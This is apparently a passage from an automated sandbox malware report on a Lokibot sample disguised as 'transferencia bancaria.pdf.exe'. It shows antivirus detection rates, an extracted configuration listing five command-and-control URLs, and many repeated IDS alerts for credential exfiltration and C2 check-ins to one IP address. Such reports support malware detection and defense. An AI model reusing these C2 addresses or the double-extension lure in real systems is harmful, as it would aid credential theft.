                  SID:2025483
                  Source Port:80
                  Destination Port:49722
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: transferencia bancaria.pdf.exeReversingLabs: Detection: 12%
                  Source: transferencia bancaria.pdf.exeVirustotal: Detection: 20%Perma Link
                  Source: sempersim.suVirustotal: Detection: 21%Perma Link
                  Source: http://sempersim.su/gl21/fre.phpVirustotal: Detection: 18%Perma Link
                  Source: transferencia bancaria.pdf.exeJoe Sandbox ML: detected
                  Source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                  Source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                  Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://sempersim.su/gl21/fre.php"]}
                  Source: transferencia bancaria.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: transferencia bancaria.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Networking

                  barindex
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:49786 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49706 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49706 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49706 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49706 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49706 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:58595 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49707 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49707 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49707 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49707 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49707 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:56331 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49708 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49708 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49708 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49708 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49708 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49708
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:50506 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49709 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49709 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49709 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49709 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49709 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49709
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:49448 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49710 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49710 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49710 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49710 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49710 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49710
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:59082 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49711 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49711 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49711 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49711 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49711 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49711
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:59504 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49712 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49712 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49712 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49712 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49712 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49712
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:65198 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49713 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49713 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49713 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49713 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49713 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49713
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:62910 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49714 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49714 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49714 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49714 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49714 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49714
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:63863 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49715 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49715 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49715 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49715 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49715 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49715
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:63229 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49716 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49716 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49716 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49716 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49716 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49716
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:62538 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49717 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49717 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49717 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49717 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49717 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49717
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:54903 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49718 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49718 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49718 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49718 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49718 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49718
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:51530 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49719 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49719 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49719 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49719 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49719 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49719
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:56122 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49720 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49720 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49720 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49720 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49720 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49720
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:52556 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49721 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49721 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49721 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49721 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49721 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49721
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:61609 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49722 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49722 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49722 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49722 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49722 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49722
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:52481 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49723 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49723 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49723 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49723 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49723 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49723
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:53943 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49724 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49724 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49724 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49724 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49724 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49724
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:56086 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49725 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49725 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49725 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49725 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49725 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49725
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:56547 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49726 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49726 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49726 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49726 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49726 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49726
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:59881 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49727 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49727 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49727 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49727 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49727 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49727
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:58917 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49728 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49728 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49728 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49728 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49728 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49728
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:50343 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49729 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49729 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49729 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49729 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49729 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49729
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:62520 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49730 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49730 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49730 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49730 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49730 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49730
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:55629 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49731 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49731 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49731 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49731 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49731 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49731
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:52079 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49732 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49732 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49732 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49732 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49732 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49732
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:56569 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49733 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49733 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49733 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49733 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49733 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49733
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:61833 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49734 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49734 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49734 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49734 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49734 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 91.142.77.45:80 -> 192.168.2.6:49734
                  Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:65044 -> 8.8.8.8:53
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49735 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49735 -> 91.142.77.45:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49735 -> 91.142.77.45:80
